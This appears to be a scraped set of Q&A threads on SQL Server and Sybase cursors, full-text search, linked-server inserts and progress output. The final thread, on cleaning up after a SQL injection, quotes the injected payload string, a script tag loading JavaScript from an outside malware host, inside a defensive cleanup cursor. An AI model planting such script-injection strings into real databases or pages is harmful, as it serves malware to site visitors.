SQL Server 2005 stored procedure unexpected behaviour - sql-server-2005

I have written a simple stored procedure (run as a job) that checks users' subscribed keyword alerts. When an article
is posted, the stored procedure sends an email to those users whose subscribed keywords match the article title.
One section of my stored procedure is:
OPEN @getInputBuffer
FETCH NEXT
FROM @getInputBuffer INTO @String
WHILE @@FETCH_STATUS = 0
BEGIN
--PRINT @String
INSERT INTO #Temp(ArticleID,UserID)
SELECT A.ID,@UserID
FROM CONTAINSTABLE(Question,(Text),@String) QQ
JOIN Article A WITH (NOLOCK) ON A.ID = QQ.[Key]
WHERE A.ID > @ArticleID
FETCH NEXT
FROM @getInputBuffer INTO @String
END
CLOSE @getInputBuffer
DEALLOCATE @getInputBuffer
This job runs every 5 minutes and checks the last 50 articles.
It was working fine for the last 3 months, but a week ago it behaved unexpectedly.
The problem is that it sends irrelevant results.
@String contains the user's alert keyword, which is matched against the latest articles using full-text search. The normal execution time is 3 minutes, but when the problem occurs the execution time is 3 days.
It is currently working fine again, but we are unable to find any reason why it sent irrelevant results.
Note: I have already removed noise words from the user alert keywords.
I am using SQL Server 2005 Enterprise Edition.

I don't have the answer, but have you asked all the questions?
Does the long execution time always happen for all queries? (Yes--> corruption? disk problems?)
Or is it only for one #String? (Yes--> anything unusual about the term? Is there a "hidden" character in the string that doesn't show up in your editor?)
Does it work fine for that #String against other sets of records, maybe from a week ago? (Yes--> any unusual strings in the data rows?)
Can you reproduce it at will? (From your question, it seems that the problem is gone and you can't reproduce it.) Was it only for one person, at one time?
Hope this helps a bit!

Does the CONTAINSTABLE(Question,(Text),@String) work in an ad hoc query window? If not, it may be that your full-text search indexes are corrupt and need rebuilding:
Rebuild a Full-Text Catalog
Full-Text Search How-to Topics
Also check any normal indexes on the Article table; they might just need rebuilding for statistical purposes, or could be corrupt too:
UPDATE STATISTICS (Transact-SQL)
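A minimal sketch of both maintenance steps, assuming a full-text catalog named QuestionCatalog (the catalog name is made up; check yours in sys.fulltext_catalogs):
-- Rebuild the full-text catalog that indexes the Question/Text column.
-- 'QuestionCatalog' is a placeholder name.
ALTER FULLTEXT CATALOG QuestionCatalog REBUILD
-- Refresh statistics on the joined table.
UPDATE STATISTICS Article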

I'd go along with Glen Little's line of thinking here.
If a user has registered a subscribed keyword which coincidentally (or deliberately) contains some of the CONTAINSTABLE search predicates, e.g. NEAR, then the query may take longer than usual. Perhaps not "minutes become days" longer, but longer.
Check for subscribed keywords containing *, ", NEAR, & and so on.
The CONTAINSTABLE function allows for a very complex set of criteria. Consider the FREETEXTTABLE function, which has a lighter matching algorithm.
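A minimal sketch of both safeguards, assuming the same Question/Text full-text setup as in the question (stripping embedded double quotes and then quoting the keyword as a phrase stops CONTAINSTABLE from interpreting operators inside it):
-- Neutralize CONTAINSTABLE operators by treating the whole keyword
-- as a single quoted phrase (embedded quotes stripped first).
DECLARE @SafeString varchar(4000)
SET @SafeString = '"' + REPLACE(@String, '"', '') + '"'
SELECT A.ID
FROM CONTAINSTABLE(Question, (Text), @SafeString) QQ
JOIN Article A ON A.ID = QQ.[Key]
-- Alternatively, FREETEXTTABLE takes the string at face value and
-- applies a lighter matching algorithm (no operator syntax).
SELECT A.ID
FROM FREETEXTTABLE(Question, (Text), @String) QQ
JOIN Article A ON A.ID = QQ.[Key]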

1) How do you know it sends irrelevant results?
If it is because a user reported the problem: are you sure she didn't change her keywords between the mail and the report?
Can you add some automatic check at the end of the procedure to check whether it gathered bad results? Perhaps then you can trap the cases when problems occur.
2) "This job run every 5 minute and it checks last 50 articles."
Are you sure it's not related to timing? If job takes more than 5 minutes one time, what happens? A second job is starting...
You do not show your cursor declaraion, is it local or could there be some kind of interference if several processes run simultaneously? Perhaps try to add some kind of locking mechanism.
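One hedged way to do that is an application lock around the job body; a minimal sketch, assuming a made-up resource name 'KeywordAlertJob':
BEGIN TRAN
DECLARE @lockResult int
-- Take an exclusive app lock; @LockTimeout = 0 bails out immediately
-- if a previous run of the job still holds it.
EXEC @lockResult = sp_getapplock
    @Resource = 'KeywordAlertJob',   -- made-up lock name
    @LockMode = 'Exclusive',
    @LockOwner = 'Transaction',
    @LockTimeout = 0
IF @lockResult >= 0
BEGIN
    -- ... the cursor loop from the question goes here ...
    PRINT 'lock acquired, running the alert check'
END
COMMIT TRAN   -- the transaction-owned lock is released here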

Since the cursors are nested, you will want to try the following. It's my understanding that testing for zero can get you into trouble when the cursors are nested. We recently changed all of our cursors to something like this:
WHILE (@@FETCH_STATUS <> -1) BEGIN      -- -1: fetch failed or past the end of the result set
    IF (@@FETCH_STATUS <> -2) BEGIN     -- -2: the fetched row is missing; skip it
        INSERT INTO #Temp(ArticleID,UserID)
        SELECT A.ID,@UserID
        FROM CONTAINSTABLE(Question,(Text),@String) QQ
        JOIN Article A WITH (NOLOCK) ON A.ID = QQ.[Key]
        WHERE A.ID > @ArticleID
    END
    FETCH NEXT FROM @getInputBuffer INTO @String
END

Related

SQL Server 2014 slow remote insert

I have several linked servers and I want to insert a value into each of them. On my first attempt, the INSERT using a CURSOR took far too long; it ran for about 17 hours. Curious about those INSERT queries, I checked a single INSERT statement using Display Estimated Execution Plan, and it showed a cost of 46% on Remote Insert and 54% on Constant Scan.
Below is the code snippet I worked with:
DECLARE @Linked_Servers varchar(100)
DECLARE CSR_STAGGING CURSOR FOR
SELECT [Linked_Servers]
FROM MyTable_Contain_Lists_of_Linked_Server
OPEN CSR_STAGGING
FETCH NEXT FROM CSR_STAGGING INTO @Linked_Servers
WHILE @@FETCH_STATUS = 0
BEGIN
BEGIN TRY
EXEC('
INSERT INTO ['+@Linked_Servers+'].[DB].[Schema].[Table] VALUES (''bla'',''bla'',''bla'')
')
END TRY
BEGIN CATCH
DECLARE @ERRORMSG as varchar(8000)
SET @ERRORMSG = ERROR_MESSAGE()
END CATCH
FETCH NEXT FROM CSR_STAGGING INTO @Linked_Servers
END
CLOSE CSR_STAGGING
DEALLOCATE CSR_STAGGING
I checked the estimated execution plan for the INSERT query only, not for all queries.
How can I get the best practice and best performance using remote INSERT?
You can try this, but I think the difference will be negligible. I recall that when reading up on the different approaches to doing inserts across linked servers, most of the standard approaches were basically on par with each other, though it's been a while since I looked that up, so don't quote me.
It will also require you to do some light rewriting due to the obvious differences in approach (assuming that you would be able to do so anyway). The dynamic SQL required to do this might be tricky, though, as I am not entirely sure you can call OPENQUERY within dynamic SQL (I should know this, but I've never needed to).
However, if you can use this approach, the main benefit is that the WHERE clause gets the destination schema without having to select any data (because 1 will never equal 0).
INSERT OPENQUERY (
[your-server-name],
'SELECT
somecolumn
, another_column
FROM destinationTable
WHERE 1=0'
-- this will help reduce the scan as it will
-- get schema details without having to select data
)
SELECT
somecolumn
, another_column
FROM sourceTable
Another approach you could take is to build an insert proc on the destination server/DB. Then you just call the proc, sending the params over. While this is a little more work and introduces more objects to maintain, it adds simplicity to your process, potentially reduces I/O when sending things across the linked server, and might save on the CPU cost of your constant scans as well. I think it's probably a cleaner-cut approach than trying to optimize linked server behavior.
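A rough sketch of that approach (proc and object names are made up; the linked server needs the 'rpc out' server option enabled for the remote EXEC to work):
-- On the destination server/DB: a plain local insert proc.
CREATE PROCEDURE dbo.usp_InsertBla
    @a varchar(10), @b varchar(10), @c varchar(10)
AS
    INSERT INTO [Schema].[Table] VALUES (@a, @b, @c)
GO
-- On the source server, inside the cursor loop: call it by
-- four-part name instead of building a remote INSERT string.
EXEC('EXEC [' + @Linked_Servers + '].[DB].[dbo].[usp_InsertBla] ''bla'', ''bla'', ''bla''')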

while loop with cursor and dynamic SQL doesn't terminate

I'd like to write a procedure that returns the name of each table that has a row with a specific id. In other words, the tables have a column 'id' which is of type varchar and contains a UUID. After doing some research, I chose the following approach (simplified, focusing on the problem that I can't solve/understand):
-- get a cursor for all foo table names that have an id column
DECLARE table_name_cursor CURSOR FOR
SELECT a.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id
AND a.name like 'Foo%'
AND b.name = 'id'
GO
-- define some variables
DECLARE @current_table_name VARCHAR(100)
DECLARE @id_found VARCHAR(100)
OPEN table_name_cursor
FETCH table_name_cursor INTO @current_table_name
WHILE @@SQLSTATUS = 0
BEGIN
EXEC ('SELECT @id_found = id from ' + @current_table_name + " where id = '@id_param'") -- @id_param will be passed with the procedure call
select @current_table_name
FETCH table_name_cursor INTO @current_table_name
END
-- clean up resources
CLOSE table_name_cursor
DEALLOCATE table_name_cursor
It works as expected when the cursor result set is fairly small (~20 tables in my case), but if the cursor size grows, the procedure never terminates.
It smells like a resource problem but my white belt in Sybase-Fu doesn't help finding the answer.
Question: why does it stop working with 'too many' cursor rows, and is there a way to get it working with this approach?
Is there an alternative (better) way to solve the real problem (running queries on all tables)? This is not intended for production; it's just some sort of dev/maintenance script.
It might help to have some context around your comment "it stops working", eg, does the proc return unexpectedly, does the proc generate a stack trace, is it really 'stopped' or is it 'running longer than expected'?
Some basic monitoring should help figure out what's going on:
does sp_who show the cursor process as being blocked (eg, by other processes that have an exclusive lock on data you're querying)
do periodic queries of master..monProcessWaits where SPID = <spid_of_cursor_process> show any events with largish amounts of wait time (eg, high wait times for disk reads; high wait times for network writes)
do periodic queries of master..{monProcessStatement|monProcessObject} where SPID = <spid_of_cursor_process> show cpu/wait/logicalreads/physicalreads increasing? (a rough sketch of these queries follows)
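A hedged sketch of those periodic MDA queries, assuming the MDA tables are enabled and using 1234 as a stand-in for the cursor process's spid:
-- Which wait events is the cursor process accumulating time on?
SELECT WaitEventID, Waits, WaitTime
FROM master..monProcessWaits
WHERE SPID = 1234
ORDER BY WaitTime DESC
-- Are cpu/wait/reads still climbing for the current statement?
SELECT LineNumber, CpuTime, WaitTime, LogicalReads, PhysicalReads
FROM master..monProcessStatement
WHERE SPID = 1234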
I'm guessing some of your SELECTs are running against largish tables with no usable index on the id column, with the net result being that some SELECTs are running expensive (and slow) table and/or index scans, possibly having to wait while large volumes of data are pulled from disk.
If my guess is correct, the MDA tables should show ever increasing numbers for disk waits, logical/physical reads, and to a lesser extent cpu.
Also, if you are seeing large volumes of logical/physical reads (indicative of table/index scans), the query plan for the currently running SELECT should confirm the use of a table/index scan (and thus the inability to find/use an index on the id column for the current table).
For your smaller/faster test runs I'm guessing you're hitting either a) smaller tables where table/index scans are relatively fast and/or b) tables with usable indexes on the id column (and thus relatively fast index lookups).
Something else to consider ... what application are you using to make your proc call?
I've lost track of the number of times where a user has run into some ... shall I say 'funky' issues ... when accessing ASE; with the issue normally being tracked back to a configuration or coding issue with the front-end/client application.
In these circumstances I suggest the user run their query(s) and/or procs via the isql command line tool to see if they get the same 'funky' results; more often than not the isql command line session does not show the 'funky' behavior, thus pointing to an issue with whatever application/tool the user has been using to access ASE.
NOTE: By isql command line tool I mean exactly that ... the command line tool ... not to be confused with wisql or dbisql or any other point-n-click GUI tool (many of which do cause some 'funky' behavior under certain scenarios).
NOTE: Even if this turns out to be a client-side issue (as opposed to an ASE issue), the MDA tables can often pinpoint this, eg, monProcessWaits might show a large amount of wait time while waiting for output (to the client) to complete; in this scenario sp_who would also show the spid with a status of send sleep (ie, ASE is waiting for client to process the last result set sent by ASE to the client).

SQL queries not 'reporting' back until all queries have finished executing

I'm running a set of SQL queries and they are not reporting the rows affected until all the queries have run. Is there any way I can get incremental feedback?
Example:
DECLARE @HowManyLastTime int
SET @HowManyLastTime = 1
WHILE @HowManyLastTime <> 2400000
BEGIN
SET @HowManyLastTime = @HowManyLastTime +1
print(@HowManyLastTime)
END
This doesn't show the count until the loop has finished. How do I make it show the count as it runs?
To flush record counts and other messages to the client, you'll want to use RAISERROR with NOWAIT. Related questions and links:
PRINT statement in T-SQL
http://weblogs.sqlteam.com/mladenp/archive/2007/10/01/SQL-Server-Notify-client-of-progress-in-a-long-running.aspx
In SSMS this will work as expected. With other clients, you might not get a response from the client until the query execution is complete.
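A minimal sketch of the loop above rewritten with RAISERROR ... WITH NOWAIT (the flush interval of 100000 is an arbitrary choice):
DECLARE @HowManyLastTime int, @msg varchar(20)
SET @HowManyLastTime = 1
WHILE @HowManyLastTime <> 2400000
BEGIN
    SET @HowManyLastTime = @HowManyLastTime + 1
    IF @HowManyLastTime % 100000 = 0   -- throttle: flushing every row is slow
    BEGIN
        -- Severity 0 is informational; WITH NOWAIT flushes the message
        -- buffer immediately instead of at the end of the batch.
        SET @msg = CONVERT(varchar(20), @HowManyLastTime)
        RAISERROR(@msg, 0, 1) WITH NOWAIT
    END
END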
SQL tends to be 'set-based', and you are thinking procedurally and trying to make it act systematically. It really doesn't make sense to do this in SQL.
I would ask your motivation for doing this, and whether there is anything better that can be tried.

Running Stored Procedure with parameters resulting from query

It's not hard to find developers who think cursors are gauche, but I am wondering how to solve the following problem without one:
Let's say I have a proc called uspStudentDelete that takes as a parameter @StudentID.
uspStudentDelete applies a bunch of cascading soft delete logic, marking a flag on tables like "classes", "grades", and so on as inactive. uspStudentDelete is well vetted and has worked for some time.
What would be the best way to run uspStudentDelete on the results of a query (e.g. select studentid from students where ... ) in TSQL?
That's exactly what cursors are intended for:
declare c cursor local for <your query here>
declare @ID int
open c
fetch next from c into @id
while @@fetch_status = 0
begin
exec uspStudentDelete @id
fetch next from c into @id
end
close c
deallocate c
Most people who rail against cursors think you should do this in a proper client, like a C# desktop application.
The best solution is to write a set-based proc to handle the delete (try running this through a cursor to delete 10,000 records and you'll see why) or to add the set-based code to the current proc with a parameter to tell you whether to run the set-based or single-record part of the proc (this at least keeps it together for maintenance purposes).
In SQL Server 2008 you can use a table-valued parameter as an input variable. If you rewrite the proc to be set-based, you can have the same logic and run it whether the proc is sent one record or ten thousand. You may need a batch process in there, though, to avoid deleting millions of records in one go and locking up the tables for hours. Of course, if you do this you will also need to adjust how the current sp is being called.
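A hedged sketch of that set-based version using a table-valued parameter (SQL Server 2008+); the type name, proc name, and the Inactive flag column are invented for illustration:
-- Table type to carry any number of student ids in one call.
CREATE TYPE dbo.StudentIdList AS TABLE (StudentID int PRIMARY KEY)
GO
CREATE PROCEDURE dbo.uspStudentDeleteSet
    @StudentIDs dbo.StudentIdList READONLY
AS
BEGIN
    -- The same cascading soft-delete logic, applied set-wise.
    UPDATE c SET Inactive = 1
    FROM classes c
    JOIN @StudentIDs s ON s.StudentID = c.StudentID
    -- ... repeat for grades and the other cascaded tables ...
END
GO
-- Caller: fill the TVP from the query, then make one proc call.
DECLARE @ids dbo.StudentIdList
INSERT @ids (StudentID)
SELECT studentid FROM students WHERE /* your criteria */ StudentID > 0
EXEC dbo.uspStudentDeleteSet @StudentIDs = @ids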

What's the best way of cleaning up after a SQL Injection?

I've been tasked with the maintenance of a nonprofit website that recently fell victim to a SQL injection attack. Someone exploited a form on the site to add text to every available text-like field in the database (varchar, nvarchar, etc.) which, when rendered as HTML, includes and executes a JavaScript file.
A Google search of the URL indicates that it's from email spammers based out of Romania or China, but that's not what's important right now.
I went through and manually removed the information from the text fields that render on the most visible and popular pages of the site, but I'm curious as to what would be the best programmatic way of removing the text from the other text fields on the site.
Obviously there's more that needs to be done (hardening the site against SQL injections, using something like markdown instead of storing HTML, etc.) and I am working on those but for the time being what I really need is a good way to go in and programmatically remove the injected text. I know what the exact text is, it's the same every time, and it's always appended to the end of any text field. I can't afford to strip out all HTML in the database at this time and I don't know when this happened exactly so I can't just roll back to a backup. Also, the site is on shared hosting and I cannot connect to the database directly with SQL Server tools. I can execute queries against it though, so if there's any way of constructing a SQL update statement to the effect of "hey find all the text fields in all of the tables in the entire database and do this to clean them" that would be the best.
Restore the data from a recent backup.
I was a victim too, and you can use this to clean up:
UPDATE Table
SET TextField = SUBSTRING(TextField, 1, CHARINDEX('</title', TextField) - 1)
WHERE (ID IN (SELECT ID FROM Table WHERE (CHARINDEX('</title', Textfield, 1) > 0)))
Assuming you've fallen victim to the same attack as everyone else, then SQLMenace's code is close. However, that attack uses a number of different script URLs, so you'll have to customize it to make sure it matches the URL you're seeing in your database.
I wrote about it as well, and my solution code included a more-generic cleanup.
One important point is that the very first thing you need to do is take down the site. Right now you're actively serving malware to your users, and that could put you in a legal fix later. Put up a placeholder page so your users aren't left in the dark, but don't keep serving up malware. Then you can fix the site to make sure it's no longer vulnerable to injection. The simplest way to do that for this particular attack is to just disable sysobjects/syscolumns permissions for your web user, but you'll want to make a more thorough cleanup as well or it's only a matter of time until you're cracked again. Then you can use the code provided to clean up the site and put it back live.
This will reverse that. Also, it would be wise to take sysobjects permissions away from the username your site runs with, and to sanitize input, of course:
DECLARE @T VARCHAR(255),@C VARCHAR(4000)
DECLARE Table_Cursor CURSOR FOR
-- every user table (xtype='u') and its text-like columns:
-- 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- prints the UPDATE statement for each affected column; run the
-- printed output to apply the cleanup
EXEC('if exists (select 1 from ['+@T+'] where ['+@C+'] like ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'') begin print ''update ['+@T+'] set ['+@C+']=replace(['+@C+'],''''"></title><script src="http://1.verynx.cn/w.js"></script><!--'''','''''''') where ['+@C+'] like ''''%"></title><script src="http://1.verynx.cn/w.js"></script><!--'''''' end')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
I wrote about this a while back here: Microsoft Has Released Tools To Address SQL Injection Attacks